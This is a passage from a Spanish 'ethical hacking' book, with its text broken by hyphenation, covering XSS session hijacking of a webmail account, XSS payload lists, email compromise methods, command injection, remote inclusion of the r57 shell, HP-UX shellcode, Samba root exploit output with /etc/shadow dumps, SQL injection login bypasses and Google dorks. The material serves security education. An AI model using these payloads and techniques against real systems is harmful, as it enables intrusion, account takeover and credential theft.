Aho ra ve re mos có mo uti li zar esa in for ma ción pa ra es tar den tro de su Mail box. Pa -ra eso, uti li za re mos un proxy, en es te ca so Snark, pa ra mo di fi car la pe ti ción y man -dar la coo kie en via da a Ub bi y que así el ser vi dor nos de je en trar co mo si fué ra mosel ver da de ro due ño de la ca si lla.

150

Hacking Etico - [PDF Document] (154)

Bases. La victima sin notar nada, ha sido redirigida a las bases del concurso.

Eje cu ta mos Snark, va mos con el brow ser a http ://mai l.ub bi .co m/in bo x.asp?fld=1(es ta URL la ob tu vi mos al es tar lo guea dos cuan do abri mos una cuen ta de prue baen Ub bi) y ve mos que apa re ce la pe ti ción pa ra ser edi ta da.

Proxy. Al pa sar la pe ti ción el proxy Snark, esto nos da la po si bi li dadde cam biar al vue lo los va lo res que lle gan has ta el ser vi dor de Ub bi.

En esa pan ta lla, reem pla za mos los va lo res de coo kie por los que nos lle ga ron pore-mail y los en via mos al ser vi dor de Ub bi. Así, el ses sion hi jac king ha con clui do.

151

Hacking Etico - [PDF Document] (155)

Bienvenido. Se sión den tro de la ca si lla de la víc ti ma sin co no cer elpass word, a tra vés de In ter net Ex plo rer. Es ta vul ne ra bi li dad fue re por ta da

al per so nal de se gu ri dad in for má ti ca de Ub bi (AGEA S.A.) en enero del 2008.Exis ten em pleos mu cho más com ple jos de XSS, tan to pa ra lo grar el XSS en el si -tio vul ne ra ble co mo pa ra ata car a una víc ti ma des de un si tio vul ne ra ble. Es re co -men da ble es tu diar tres co sas en es pe cial acer ca de es ta téc ni ca (que mu chos su bes -ti man y que es de un po ten cial tre men do en ma nos de al guien con in ge nio):

• El ex ce len te li bro so bre Cross Si te Scrip ting, edi ta do por Syn gress, ti tu la do CrossSi te Scrip ting At tacks XSS Ex ploits and De fen se (2007). En tre sus re dac to res, seen cuen tra Pet ko Pet kov de GNU CI TI ZEN.

• La he rra mien ta XSS-Proxy, que po de mos en con trar en http://xss-proxy .sour ce -for ge .net jun to a al gu nos ex ce len tes do cu men tos.

• Vi si tar www.xs sed .com, un si tio en don de po de mos en con trar ex ce len tes no tas,ejem plos y lis tas de si tios vul ne ra bles.

152

Hacking Etico - [PDF Document] (156)

Xssed. Si tio de di ca do ex clu si va men te a cues tio nes re la cio na das con elCross Si te Scrip ting. És ta es la sec ción de ar tí cu los: www.xs sed .co m/ar ti cles list.

XSS afec ta tan to a los vi si tan tes de si tios co mo a los usua rios y sus ad mi nis tra do -res o agen tes de la or ga ni za ción. No hay que su bes ti mar el XSS. Al gu nos có di gospa ra la com pro ba ción de la vul ne ra bi li dad:

alert(‘xss’);//%3Cs crip t%3Ea lert(‘XSS’)%3C/s crip t%3E

;alert(%22XSS%22);//<scrip t>a lert(‘XSS’)</s cript><IMG%20SRC =’ja vas crip t:a lert (do cu ment .coo kie)’><IMG SRC =”ja vas crip t:a lert(‘XSS’);”><IMG SRC =”ja vas crip t:a lert(‘XSS’)”<IMG SRC =ja vas crip t:a lert(‘XSS’)><IMG SRC =Ja VaS cRiP t:a lert(‘XSS’)><IMG SRC =ja vas crip t:a lert (&quot;XSS &quot;)><IMG SRC =`ja vas crip t:a lert(“‘XSS’”)`><IMG “””><SCRIP T>a lert(“XSS”)</S CRIPT>”><IMG SRC =ja vas crip t:a lert(S tring .from Char Co de(88,83,83))><IMG%20SRC =’ja vasc rip t:a lert (do cu ment .coo kie)’>

153

Hacking Etico - [PDF Document] (157)

<IMG SRC =”jav as crip t:a lert(‘XSS’);”>“><script>”<scrip t>a lert(“XSS”)</s cript><<scrip t>a lert(“XSS”);//<</s cript><scrip t>a lert (do cu ment .coo kie)</s cript>‘><scrip t>a lert (do cu ment .coo kie)</s cript>‘><scrip t>a lert (do cu ment .coo kie);</s cript>\”;alert(‘XSS’);//%22;alert(%22XSS%22);//%3cs crip t%3ea lert(“XSS”);%3c/s crip t%3e%3cs crip t%3ea lert (do cu ment .coo kie);%3c%2fs crip t%3e%3Cs crip t%3Ea lert(%22X%20SS%22);%3C/s crip t%3E&lts cript&g ta lert (do cu ment .coo kie);</s cript>&lts cript&g ta lert (do cu ment .coo kie);&lts cript&g ta lert<xss><s crip t>a lert(‘XSS’)</s cript ></vul ne ra ble><IMG SRC =”jav &#x09;as crip t:a lert(‘XSS’);”><IMG SRC =”jav &#x0A;as crip t:a lert(‘XSS’);”><IMG SRC =”jav&#x 0D;as crip t:a lert(‘XSS’);”><IMG SRC=” &#14; ja vas crip t:a lert(‘XSS’);”><IMG DYNSRC =”ja vas crip t:a lert(‘XSS’)”><IMG LOWSRC =”ja vas crip t:a lert(‘XSS’)”><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;

&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Si queremos ver más ejemplos, podemos visitar la página de RSnake, en la siguientedirección http ://ha.c ker s.org/xss.html.

15 maneras de comprometer una casilla de correo

Ade más del XSS, exis ten al gu nos otros mé to dos (en tre sim ples y avan za dos) pa racom pro me ter una ca si lla de co rreo elec tró ni co.

154

Con vie ne uti li zar el brow ser Fi re fox con el com ple men to noS cript (http ://nos cript .net) pa ra no

su frir los XSS. No ha ce fal ta ha cer clic en un link o bo tón pa ra ser víc ti ma de Cross Si te Scrip -

ting, po de mos ser lo sim ple men te en tran do en un si tio, al vi sua li zar un e-mail o un men sa je de

fo ro y de mo do to tal men te trans pa ren te sin avi so y sin no tar lo.

Con se jo pa ra usua rios de In ter net

Hacking Etico - [PDF Document] (158)

• Pro bar pass words co mu nes, ló gi cos y los co no ci dos en ver sio nes evo lu cio na das.• Pro bar pass words que el usua rio uti li za en otros la dos.• Ape lar al vul ne ra ble fac tor hu ma no (in ge nie ría so cial).• Gra bar las pul sa cio nes del te cla do me dian te un key log ger de soft wa re o de hard wa re.• Sa car cla ves al ma ce na das en un pro vee dor de In ter net (ISP).• Sa car cla ves en trán si to en tre el ser vi dor y la ter mi nal (snif fing).• Por re trie ve: en viar la a otro e-mail al que sí te ne mos ac ce so.• Por ex plo ta ción de una vul ne ra bi li dad me dian te ex ploits en la má qui na del usua -rio o me dian te sha res (car pe ta o dis co com par ti do).

• Por sus trac ción de cla ves en apli ca cio nes y ser vi do res de ter ce ros.• Por fuer za bru ta.• En trar vía log de HTT P_RE FE RER (va ria ble pre de fi ni da de PHP, www.php freaks -.com/PH P_Re fe ren ce /Pre de fi ned-Va ria bles/8.php) di rec to a la ca si lla sin cla ve.

• Asal to fí si co a la má qui na de la vic ti ma vía USB u otro puer to o uni dad.• Eva sión de pre gun ta se cre ta u otro da to a tra vés de SQL In jec tion.• Mé to dos avan za dos o com ple jos co mo Ea ves drop ping (ver el con te ni do de unmo ni tor por emi sión de ra dia ción).

• Mé to dos de cam po co mo Tras hing (re vi sar la ba su ra), shoul der surfing (mi rar cuan doun usua rio te clea), fil ma ción del te cla do, mi rar si no lo tie ne ano ta do en un pa pel en eles cri to rio, de ba jo del te cla do, en el CPU o con un Post-It pe ga do en el mo ni tor.

Eje cu ción re mo ta de co man dos e in clu sión de ar chi vos

La pro gra ma ción PHP en los si tios jue ga un rol muy im por tan te. Los ar chi vos in -clui dos en un si tio pro gra ma do de mo do in se gu ro per mi ti rán, en tre otras co sas:

• Eje cu tar co man dos de sis te ma den tro del ser vi dor.• Su bir ar chi vos (scripts de eje cu ció n/ex plo ra ción) al ser vi dor, téc ni ca co no ci daco mo Re mo te fi le in clu sion.

En el pri mer ca so, se apro ve cha el script mal pro gra ma do en PHP pa ra que, lue -go de que és te cum pla la fun ción que en un ini cio el pro gra ma dor ideó, se gui da -men te eje cu te un co man do de sis te ma. ¿Có mo lo grar es to? Sim ple men te, bus carla con ca te na ción de las ac cio nes agre gan do un pun to y co ma an tes del co man do enun cam po de da tos (en es te ca so) por pro ce sar. Por ejem plo: www .si tio vul ne ra ble -.com /ping.php ?=va lor-real ;co man do-li nux. El pun to y co ma en Li nux es usa dopa ra se pa rar co man dos por eje cu tar en una se cuen cia: co man do 1;co man do 2;co man -do3.

155

Hacking Etico - [PDF Document] (159)

Comando. Aquí, en el cam po de da tos de un script que ha ce pings a hostsre mo tos, se in tro du jo el co man do lis tar ;ls –al en lu gar de una di rec ción IP.

Co mo re sul ta do, ob te ne mos una lis ta de ta lla da de los ar chi vos quese en cuen tran en el mis mo di rec to rio que el script que rea li za pings.

En el se gun do ejem plo, pa ra re mo te fi le in clu de, en lu gar de co lo car un co -man do en el URL se in tro du ce una di rec ción web con el ar chi vo des car ga ble oeje cu ta ble en el host víc ti ma. El ar chi vo pue de ba jar se o bien, ba jar se y ac to se gui do eje cu tar se. Por ejem plo: www .si tio vul ne ra ble .com /mos tra r.asp ?fi le=www. si tio ma lig -no .co m/ar chi vomaligno.txt.

156

Hacking Etico - [PDF Document] (160)

ShellPHP. En el URL se reem pla za par te de la di rec ción pa ra agre gar el back door R57S hell1.31 (www.r 57.li/r57.txt?) y así eje cu tar la in ter faz grá fi ca de co man dos en el ser vi dor.

El pro gra ma dor y el ad mi nis tra dor del ser vi dor de be rán to mar las pre cau cio nes ne -ce sa rias en el di se ño de la apli ca ción o de los scripts pa ra lue go tes tear los y así des -pe jar du das. Un buen re cur so pa ra em pe zar a ha cer lo es es tu diar la guía de se gu ri -dad PHP (http://php se c.org /pro jects /gui de).

Pro gra ma ción in se gu ra: ex ploits

Los ex ploits son, en su ma yo ría, pe que ños pro gra mas ar te sa na les (al gu nos ex tre ma -da men te com ple jos) que, al ser eje cu ta dos y si son fun cio na les, se apro ve chan deun bug (des cui do de pro gra ma ción) en el ob je ti vo. El nom bre pro vie ne de to ex -ploit o ex plo tar, que sig ni fi ca apro ve char se de la vul ne ra bi li dad.Pue den es tar crea dos es pe cí fi ca men te pa ra de mos trar una fa lla (POC, Proof OfCon cept, prue ba de con cep to) en de ter mi na da apli ca ción o par te del sis te ma ope -

157

Aquí es tán los si tios de al gu nas de las per so nas y gru pos que es cri bie ron (e hi cie ron pú bli cos)

in te re san tes ex ploits o ad vi so ries (avi sos de se gu ri dad que per mi ten es cri bir ex ploits por su

fuen te de da tos téc ni cos del bug): TE SO (http ://pac kets torm .li nux se cu rity .com /groups /te so/),

NS Fo cus (www.ns fo cus .co m/en/) y So lar Eclip se (www.ph ree do m.org /so la r/ex ploits/).

Ex ploits y ad vi so ries

Hacking Etico - [PDF Document] (161)

ra ti vo (ser vi cio, bi na rio o ker nel) en una au di to ria de có di go o re search li ga do a se -gu ri dad (tes tear si un sis te ma es tá ase gu ra do co rrec ta men te), o bien pa ra co me terun ac to no au to ri za do en un sis te ma, una in tru sión (ob ten ción de una shell re mo -ta sin au to ri za ción), ele va ción de pri vi le gios (ob te ner per mi sos de root o sys tem),de ne ga ción de ser vi cios o des truc ción de in for ma ción.El ob je ti vo pro pio o aje no de tes tear se con el ex ploit es tá en la de ci sión de quienlo ma ni pu la, ya que por sí so lo no es un pro gra ma ma lig no. Si cae en ma nos de unscript kid die, de ja ría de te ner pro pó si tos edu ca ti vos ya que és te no va pro bar de ter -mi na da fa lla en una in ves ti ga ción se ria.

Mirror. An ti guo re po si to rio de ex ploits li bres al pú bli co. Se en con tra baen la di rec ción http ://hack .co .za y hoy pue de ver se en uno de los po cos

mi rrors que que da ron: http ://dark net .hac klib .com/lynx.html.

Ex ploits lo ca les y re mo tos

Los ex ploits lo ca les se eje cu tan den tro de una shell pa ra apro ve char se de al go quees tá den tro de ese con tex to o sis te ma ope ra ti vo, y los re mo tos (si bien tam bién seeje cu tan en una shell y es po si ble ha cer lo con tra la mis ma shell), el ob je ti vo en lama yo ría de los ca sos es ta rá en otro host o di rec ción IP, ya sea a tra vés de In ter -net o de una red lo cal e in ter na.

158

Hacking Etico - [PDF Document] (162)

Aun que co mún men te los en con tra re mos es cri tos en C y as sembly, los ex ploits pue -den es tar pro gra ma dos en va rios len gua jes, ya que hay en Perl, Pyt hon, C++, en -tre otros. És tos, a su vez, pue den en con trar se com pi la dos o no, co mo tam bién dis -po ni bles pa ra las más di ver sas ar qui tec tu ras.Pa ra ver al gu nos ejem plos, po de mos vi si tar sitios como www .milw0rm .com owww .pac kets torm se cu rit y.org. Los más com ple jos y los que usual men te se uti -li zan, son aque llos que se apro ve chan de una con di ción de no mi na da des bor da -mien to de buf fer (buf fer over flow). ¿Qué es es to? La me jor de fi ni ción se en cuen -tra en el dic cio na rio Jar gon (www .jar gon .net /jar gon fi le/s/s masht hes tack.html) ydi ce “smash the stack (ba jo pro gra ma ción C).En al gu nas im ple men ta cio nes de C es po si ble co rrom per la pi la de eje cu ción (exe -cu tion stack) es cri bien do más allá del fin de una ca de na de cla ra da au to en una ru -ti na. El có di go que ha ce es to po si ble se di ce que des bor da la pi la (smash the stack)y pue de cau sar el re tor no de la ru ti na y el sal to a una di rec ción ca sual. Es to pue depro du cir al gu nos de los más ma lig nos bugs co no ci dos has ta aho ra. Exis ten cier tasva rian tes (de tra duc ción li te ral du do sa) que re ci ben los si guien tes nom bres en in -glés: trash the stack, scrib ble the stack, man gle the stack. Tam bién se sue le usar pa -ra des cri bir smash the stack: alias bug, fan dan go on co re, me mory leak, pre ce den -ce los sa ge, ove rrun screw.” Po de mos en con trar es to en el ex ce len te tex to de AlephOne pu bli ca do en la ph rack N.° 49 y tra du ci do por Ho no riak al es pa ñol en ju lia nor .tri pod .com/bc/s mas hing/P49-4-Smas hing_t he_s tack-Spa nish.txt.En po cas pa la bras, una vez que el ex ploit lo gra des bor dar el buf fer, in yec ta los co -man dos de cla ra dos en el shell co de (pro gra ma do ge ne ral men te en as sembly, pe roes cri to en for ma to he xa de ci mal). Un co man do que se eje cu ta rá pa ra apro ve char sede esa con di ción BOF (Buf fer Over flow) y lo grar así el pro pó si to. És te se ría só lo el shell co de pa ra eje cu tar una shell en la pla ta for ma HP-UX.

/** Hp-Ux* * exec ve() of /bin/sh by K2*/

u_char shell co de[] =“\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40”“\x01\x62\xb 4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\x be”“\x20\x20\x08\x 01\xe4\x 20\xe0\x08\x96\xd6\x05\x34\x de \xad\x ca\x fe

/bin/sh\xff”;

Pa ra más de ta lles téc ni cos, po de mos vi si tar http ://good fe llas.s hell co de

159

Hacking Etico - [PDF Document] (163)

.co m.ar /docz /bof /bof-for kidz-es.txt o el tu to rial de shell co ding que en con tra mosen www .vi vid ma chi nes .com/s hell co de/s hell co de.htmlÉs te es un sim ple ejem plo (out put) de eje cu ción pa ra ex ploit lo cal (ex plo ta un bugdel ker nel del Li nux en el que es ta mos) pa ra ele var pri vi le gios, lue go de ser es cri toen la shell me dian te el edi tor vi:

—8<

lab@www2:/tmp$ gcc c.c -o c (se com pi la)

lab@www2:/tmp$ ./c (se eje cu ta el com pi la do) [+] At ta ched to 24087[+] Sig nal caught[+] Shell co de pla ced at 0x4000e61d[+] Now wait for suid shell...sh-2.05a# cat /etc/s ha dow (aquí, co mo root ve mos el ar chi vo sha dow) root:cs hEOcCXG6Y1w:11790:0:99999:7:::dae mon:*:11773:0:99999:7:::bin:*:11773:0:99999:7:::news:*:11773:0:99999:7:::uucp:*:11773:0:99999:7:::proxy:*:11773:0:99999:7:::

—8<

A continuación, vemos el ejem plo de un ex ploit re mo to que, al ser eje cu ta docon la di rec ción IP del ob je ti vo, nos da en él una shell di rec ta men te con pri vi -le gios de root a tra vés del ser vi cio Sam ba.

[roo t@roo tlabs]# ./ss -b 0 di rec ción-ip-re mo ta (eje cu ción)

sam ba-2.2.8 < re mo te root ex ploit by eS Dee (www .ne tri c.org |be)———————————————————————————————+ Bru te for ce mo de. (Li nux)

+ Host is run ning sam ba.+ Wor ked!———————————————————————————————*** JE MOET JE MUIL HOU WE

160

Hacking Etico - [PDF Document] (164)

Li nux it100 2.4.20-ac2 #1 Sun Mar 5 04:20:06 MST 2006 i686 unk nownui d=0(root) gi d=0(root) groups =135432365,98(no body)su rootcat /et c/is sue

Wel co me to \s \r (\l)

cat /etc/s ha dowroo t:$1$El01X6Rb$c/6WyBkNQgmvQ3hc Be5/D/:12111:0:::::bin:*:9797:0:::::dae mon:*:9797:0:::::shut down:*:9797:0:::::halt:*:9797:0:::::smmsp:*:9797:0:::::—8<

A con ti nua ción, vea mos al gu nas pa la bras uti li za das a mo do de lun far do o slangre la cio na das con los ex ploits.

• Con se guir uid0: Es por uid (user ID) 0 (ce ro). Es re fe ren te al usua rio root,con se guir pri vi le gios de root.

• Es pau near una shell (to spawn a shell): Dis pa rar una shell, bin dear. Ha cerque una shell sea ha bi li ta da (en via da) por la víc ti ma al ata can te, pu dien do és tecon tar con una se sión in te rac ti va me dian te co man dos.

• Roo tear, ru tear, en ru tear: Con se guir pri vi le gios de root.

• 0wned, p0w ned, ow ned, pw ned: Adue ña do, que le in va die ron la má qui na, pá -gi na web o ser ver a la víc ti ma. Es una for ma cí ni ca de de cir que al guien fue com -pro me ti do (en par te de su es ce na rio o pri va ci dad) me dian te téc ni cas de hac king.

• Priv8 (keep in priv8): priv es pri va te (pri va do), 8 es eigth. Así, pri veigth sue naco mo pri va te en in glés. Se uti li za pa ra anun ciar que se man ten ga en pri va do elex ploit y no se ha ga pú bli co.

• 0day o Ze ro Day: Ex ploit pri va do, no pú bli co.

• Ex ploit in the wild: Ex ploit re cien te que se es tá usan do pa ra co me ter in tru sio nes alazar o ma si vas so bre ser vi cios y que exis te un ad vi sory de la fa lla que ex plo ta.

161

Hacking Etico - [PDF Document] (165)

162

www.milw0rm.com

Aquí podemos encontrar muchos exploits locales y remotos, de las másvariadas plataformas y aplicaciones, publicados por sus propios autores.Contaremos también con un sistema de desciframiento online de contraseñashasheadas en algoritmo MD5, videos de técnicas de intrusión y artículosinteresantes acerca de seguridad.

Hacking Etico - [PDF Document] (166)

6 > Inyecciónde código

SQLEn este capítulo veremos las características y

el alcance que tiene un descuido importante en

los activos por la deficiente implementación

de seguridad informática, tanto en el código

como en la administración de un contexto donde

se lleva a cabo la gestión de información con

base de datos relacionales.

Detalles, ejemplos y casos de SQL Injection, su

impacto, componentes involucrados y su

incidencia en el escenario de la organización.

Hacking Etico - [PDF Document] (167)

INTRODUCCIÓNEl descuido que permite inyectar código SQL (Structured Query Language) va a perdu-rar tanto –por lo humano- y es tan interesante, que se merece un capítulo aparte.En la actualidad, un gran número de sitios y aplicaciones web interactúan con ba-ses de datos ya que, a través de éstos, se maneja información de diferentes nive-les de criticidad, que deben ser almacenados, consultados o modificados, es de-cir, gestionados de algún modo. Esta información –sensible o no-, es accedida através de sentencias SQL, embebidas desde el mismo código fuente de la páginao scripts incluidos.

Curso. En la dirección www.aulaclic.es/sql/f_sql.htm,encontramos un curso básico y gratuito acerca de SQL.

La interacción ocurre más o menos de este modo:• El usuario introduce datos en un formulario o hace clic en un link del tipohttp://sitioweb/producto.asp?id=25.• El sitio web podría estar programado en .asp o .php (entre otros lenguajes) y a suvez contendrá, en su código fuente, strings SQL (sentencias).

• Éstas, junto con los datos suministrados por el visitante, irán directamente a la base

164

En www.f5.com/pdf/white-papers/sql-injection-detection-wp.pdf, hay un excelentetexto que explica las técnicas de evasión aplicadas al SQL Injection, como pueden serel uso de codificación HEX, UNICODE, BASE64, Decimal, como también manipulaciónde espacios en blanco, comentarios del tipo código fuente C, concatenación, etcétera.

Otras clases de evasión

Hacking Etico - [PDF Document] (168)

de datos para lograr un resultado a partir de lo que ideó e interpretó el programadoro analista: consulta, almacenamiento, modificación, borrado, ejecución, etcétera.

• El resultado puede mostrarse al usuario o no, o bien puede dar un error de siste-ma.

Mysql. En http://dev.mysql.com/downloads/mysql/5.0.html,está disponible el servidor MySQL para practicar cómo crear databases

y manipular su contenido sobre diversas plataformas.

El programador web medio, o quien fuera el desarrollador de ese script, en prin-cipio busca funcionalidad en la aplicación, es decir, que obtenga simplemente elresultado esperado o la acción. Luego intentará obtener un mejor diseño visual,que luzca bien ante los ojos del usuario. Recién por último se preocupará por laseguridad y cómo aplicarla de modo correcto. Es allí cuando nace el descuido, yaque generalmente implementa sólo algunas comprobaciones en los campos (algomuy normal que enseñan en los cursos de programación).

165

Las hay del tipo ORM, LDAP, XML (hacking SOAP), SSI, XPATH, e IMAP/SMTP. Podemos ob-tener más información en los siguientes sitios: www.owasp.org/index.php/Testing_for_OR-M_Injection, www.owasp.org/index.php/Testing_for_LDAP_Injection, www.owasp.org/in-dex.php/Testing_for_XML_Injection y www.owasp.org/index.php/Testing_for_SSI_Injection.

Otras clases de inyección

Hacking Etico - [PDF Document] (169)

Textfield. Los campos de datos son aquellos espaciosen los que escribimos la información que va a procesar el servidor

(usuario, password y, a veces, otro tipo de datos personales o relativos al sitio).

Estos campos suelen estar bajo determinadas reglas de filtrado desde la mismapágina: caracteres especiales, mínimos y máximos en cantidad de letras o núme-ros. Estas reglas pueden ser eludidas fácilmente mediante la manipulación de losdatos en tránsito (a través de un proxy camino al servidor).La primera ley del desarrollador web en cuanto seguridad es jjaa mmááss ccoonn ffiiaarr eenn qquuee ttoo ddoossllooss uussuuaa rriiooss oo vvii ssii ttaann tteess iinn ttrroo dduu ccii rráánn llooss ddaa ttooss ccoo rrrreecc ttooss oo eess ppee rraa ddooss ddeenn ttrroo ddee uunn ffoorr mmuu llaa --rriioo oonn llii nnee; la se gun da re gla es nnoo ccrreeeerr qquuee ttoo ddooss llooss vvii ssii ttaann tteess vvaa yyaann aa rreess ppee ttaarr llaa ssiinn ttaa xxiissddee llaa UURRLL ddee ccoonn ssuull ttaa ssiinn mmoo ddii ffii ccaarr llaa aall rreeaa llii zzaarr eell qquueerryy (pe ti ción http).

Ejem plo de by pass de ac ce so

Vea mos un ejem plo de la téc ni ca apli ca da a un lo gin de au ten ti fi ca ción o ac ce so.Den tro del ar chi vo .asp de es te ac ce so a clien tes que veremos a continuación, seen con tra rá la sen ten cia SQL o ru ti na de va li da ción pa ra el ac ce so ha cia una in tra -net. Es ta ac ción pro ve nien te de la or den o sen ten cia ve ri fi ca rá que usua rio, pass -

166

Es im por tan te re cor dar las va rian tes de sin ta xis (en in yec ción) se gún el ges tor de da ta ba ses (MS-SQL,Mysql, Ora cle, Post greSQL). Pa ra en con trar in for ma ción, po de mos vi si tar http ://se cu rity-pa pers .glo -bint .co m.a r/o ra cle _se cu rity/sq l_in jec tio n_i n_o ra cle.php, www .se cu rity fo cus .co m/in fo cus/1644,www .ti zag .com/mysql Tu to rial/mysql-php-sql-in jec tion.php y www .post gresq l.org /docs /tech docs.50.

Va rian tes de sin ta xis

Hacking Etico - [PDF Document] (170)

word y cuen ta sean los co rrec tos pa ra de jar ac ce der al vi si tan te en ca so de que ten -ga e in tro duz ca es tos da tos co rrec ta men te. En el có di go, se ve rá la sin ta xis tran -sac cio nal SQL (a la da ta ba se) más o me nos así:

SE LECT idFROM lo ginWHE RE usua rio = ‘$usua rio’AND cla ve = ‘$cla ve’AND cuen ta = ‘$cuen ta’

Login. Ac ce so a clien tes de un si tio web ele gi doal azar de los tan tos que hay vul ne ra bles en In ter net.

Aho ra bien, ¿có mo el in tru so in yec ta rá una sen ten cia SQL en lu gar de co lo car usua -rio, pass word y cuen ta? Es muy sim ple. Si los cam pos de da tos, la apli ca ción y elges tor de da tos no es tán ssaa nnii ttii zzaa ddooss ((nnoo eess ccaa ppaa aa llooss ccaa rraacc ttee rreess eess ppee cciiaa lleess)) y ase gu ra -dos, se po drá in cluir una co mi lla sim ple ‘ y se gui do a ella, el res to de lo que se rá in -ter pre ta do por el ges tor de ba se de da tos co mo có di go SQL.

167

Hacking Etico - [PDF Document] (171)

SE LECT idFROM lo ginWHE RE usua rio = ‘ad min’AND cla ve = ‘’’OR 1=1 –AND cuen ta = 0303456

Un pa rá me tro no es pe ra do, co mo es ta co mi lla, cam bia el com por ta mien to de laapli ca ción. De es te mo do, si el usua rio es el ad min y tie ne un pass word /con di -ción, si 1 es igual a 1 (que por su pues to lo es), és te se rá va li da do y ten drá ac ce soa la in tra net.

Adentro. Aquí es tá el ac ce so al pa nel del usua rio ad min lue gode in yec tar le un pe que ño có di go SQL ’OR 1=1 — den tro del cam po de cla ve.

¿Qué in ci den cia tie ne es ta vul ne ra bi li dad en nues tro sis te ma? Mu cha. Un in tru soque pue da bur lar me ca nis mos en de bles de se gu ri dad en un si tio con in te rac ción ada ta ba ses y pos te rior men te lo gre in yec tar có di go SQL, po drá lle var a ca bo ac cio -nes in tru si vas en el ser vi dor (y la red in ter na si és ta se en cuen tra de trás), com pro -me ter in for ma ción, des truir, co piar o bien, mo di fi car. En se gu ri dad in for má ti ca,es ta téc ni ca es co no ci da co mo SSQQLL IInn jjeecc ttiioonn. ¿Có mo sa ber que un de ter mi na docam po de da tos o URL es vul ne ra ble a la in yec ción de có di go SQL? Sim ple men tein ten tan do es cri bir y en viar una co mi lla sim ple pa ra ob te ner de ter mi na do error desis te ma. Por su pues to, hay otros mé to dos, pe ro ése es el más rá pi do y usual. Elerror ori gi na do por la ba se de da tos se ve más o me nos de es ta ma ne ra:

168

Hacking Etico - [PDF Document] (172)

Error. Error 80040e14: Un clo sed quo ta tion mark be fo rethe cha rac ter string es, qui zás, el anun cio se gu ro de que la apli ca ción

es po ten cial men te ex plo ta ble en cuan to a in yec tar có di go SQL.

En la si guien te ima gen, po de mos ver có mo ge ne rar ese error a mo do de com pro -bar la exis ten cia de la vul ne ra bi li dad o des cui do:

Intento. Co lo ca mos una co mi lla sim ple ‘ en el cam poLo gin de ac ce so y, ac to se gui do, ha ce mos clic en Acep tar.

169

Si bus ca mos en Goo gle inur l:lo gi n.asp o inurl :bus ca r.asp, va mos a te ner co mo re sul ta docan ti da des de for mu la rios de ac ce so, links o cam pos de con sul ta de da tos pa ra ver di choserro res. Otros ejem plos son: inur l:lo gi n.asp, si te:.ar, in tra net o uti li zar pass wor d.asp, con -tra se na.asp, cla ve.asp o in ti tle:”ac ce so res trin gi do”, in ti tle:”ac ce so clien tes” o si te:.asp.

Bus car en Goo gle

Hacking Etico - [PDF Document] (173)

Aho ra vea mos có mo ha cer un by pass (sal tear) de la pre gun ta se cre ta:

Salto. En el cam po Lo gin de ac ce so, co lo ca mos el nom bre del usua rio del que de sea mos sa ber la cla ve y, en el cam po Res pues ta

(de la pre gun ta se cre ta), es cri bi mos ‘OR 1=1 —. El re sul ta do es el re trie ve (el ha ber ob te ni do) de la cla ve del usua rio.

Información. El sal to de la pre gun ta se cre ta fuepo si ble me dian te la in yec ción de un mí ni mo có di go SQL.

Ejem plo so bre la mo di fi ca ción de un URL.

170

Hacking Etico - [PDF Document] (174)

Error. Aquí se pue de ver có mo, al te ran do el URLcon una co mi lla sim ple, tam bién se lo gra re pro du cir el error.

HIS TO RIA DE SQL IN JEC TIONSQL In jec tion se uti li za ha ce más de 10 años. In con ta bles ba ses de da tos se han bo rra -do, al te ra do o ro ba do me dian te es ta téc ni ca. Mu chos ac ce sos y com pro ba cio nes han si -do bur la dos, co mo tam bién se han ob te ni do re mo ta men te cuen tas de má xi mo pri vi le -gio den tro de los ser vi do res. To do es to a tra vés del ser vi dor web (puer to 80 o servicio http) de un si tio.El pri mer tex to pu bli ca do acer ca de có mo ha cer lo da ta de di ciem bre de 1998 (www.ph -rac k.or g/ar chi ves/54/P54-08), lo re dac tó rain .fo rest .puppy y es ta ba den tro de un tex tode di ca do a vul ne ra bi li da des ba sa das en tec no lo gías NT. De es te do cu men to, con vie nepres tar es pe cial aten ción a la sec ción ODBC and MS SQL ser ver 6.5. Unos años des pués, lue go de que es te ti po de ex plo ta ción se dis cu tió en al gu nos fo rosy con gre sos, sal drían a la luz tres do cu men tos (que es re co men da ble es tu diar y prac ti car)en los que se ba sa ron ca si la to ta li dad de los tex tos que pos te rior men te se pu bli ca ronacer ca del te ma:

• Ad van ced SQL In jec tion In SQL Ser ver Ap pli ca tions, de Ch ris An ley (www -.next genss .com /pa per s/ad van ced_sq l_in jec tion.pdf).

• (mo re) Ad van ced SQL In jec tion, del mis mo au tor (www .next genss .com /pa pers /mo re_ad van ced_sq l_in jec tion.pdf).

• Ma ni pu la ting Mi cro soft SQL Ser ver Using SQL In jec tion, de Ce sar Ce rru do (ww w.app se cinc .com /pre sen ta tions /Ma ni pu la ting_SQL _Ser ve r_U sing_SQ L_Injection.pdf).

171

Hacking Etico - [PDF Document] (175)

Me to do lo gíaBá si ca men te, lue go del ca rác ter no fil tra do (‘ o ;, pa rén te sis en al gu nos ca sos –sincon tar las téc ni cas de eva sión-), es al go más que es cri bir pu ro có di go SQL.En prin ci pio, hay que en con trar un cam po o pun to vul ne ra ble a la in yec ción. Yasea un for mu la rio de ac ce so user /pass, uno de bús que da, de re cu pe ra ción de pass -word, de com pro ba ción de cual quier da to, de con tac to, link con va ria bles, linksocul tos al pú bli co li ga dos a la DB, scripts y ar chi vos de tes teo, CGIs por de fec to,apli ca cio nes del ti po fo ro y otras de ter ce ros pú bli cas y li cen cia das, ya sea vía mé -to do GET o POST.

Querys. En es te si tio, se ex pli can en de ta llelas di fe ren cias en tre los mé to dos GET y POST en cuan to

a en vío de la in for ma ción (www.cs .tut .fi/~j kor pe la /forms /met hods.html).

Des pués, ha cien do una pre via de da ta ba se gat he ring o tra tan do de ma pear cuá lesson las da ta ba ses del ser vi dor, los nom bres, sus ta blas, sus re gis tros, sus usua riosy sus pri vi le gios. Ge ne ral men te, se uti li za HA VING y GROUP BY pa ra las pri -me ras. So bre la ba se de esos da tos, se tra ta de ir ar man do nues tras con sul tas in -yec ta das, pu lién do las, vien do qué sen ten cias se pue den uti li zar, si hay es pa cios demás, có mo in te rac tuar las.

172

Hacking Etico - [PDF Document] (176)

